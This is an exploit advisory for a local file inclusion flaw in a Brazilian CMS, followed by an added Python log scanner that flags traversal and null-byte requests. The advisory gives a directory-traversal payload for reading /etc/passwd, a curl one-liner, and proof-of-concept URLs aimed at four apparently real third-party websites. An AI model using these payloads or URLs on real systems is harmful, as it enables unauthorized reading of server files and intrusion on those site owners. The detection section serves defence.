[+] Local File Inclusion on CMS NETGEAR powered by PICTOR

[+] Date: 14/12/2016

[+] Risk: Medium

[+] CWE number: CWE-98

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.pictor.com.br/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: GNU/Linux

[+] Vulnerable File: index.php

[+] Exploit : 

	http://host/index.php?pag= [ Local File Inclusion ]

[+] Payload :

	"../../../../../../../../../../../../../etc/passwd"

[+] Example :

	felipe@andrian # echo "Local File Inclusion:";curl -s "http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00" | grep :x
	Local File Inclusion:

[+] PoC :

	http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
	http://tecnopisos.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
	http://www.lucaldasbijoux.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
	http://qualysul.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
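
[+] Detection (added example, not part of the original advisory or the vendor's code): a log scanner that flags requests whose `pag` value decodes to a traversal sequence or carries the `%00` terminator shown in the payload above. It assumes Combined Log Format access logs; the sample lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "pag"  # include parameter named in the advisory
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2016:10:00:01 -0200] "GET /index.php?pag=contato&id=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [14/Dec/2016:10:00:05 -0200] "GET /index.php?pag=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '192.0.2.77 - - [14/Dec/2016:10:00:09 -0200] "GET /index.php?pag=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
]


def fully_decode(value, max_rounds=3):
    """Undo leftover percent-encoding layers so the value is compared in clear."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def inspect_value(value):
    """Return the reasons a pag value looks like a file-inclusion probe."""
    decoded = fully_decode(value).replace("\\", "/")
    reasons = []
    if ".." in decoded.split("/"):  # a whole path segment equal to ".."
        reasons.append("traversal")
    if "\x00" in decoded:  # %00 used to cut off an appended extension
        reasons.append("null-byte")
    return reasons


def scan(lines):
    """Return [(line_number, reasons)] for requests with a suspicious pag value."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        query = urlsplit(match.group(1)).query if match else ""
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == PARAM and (reasons := inspect_value(value)):
                hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit with a 200 status and a response size unlike the site's normal pages is the request to review first.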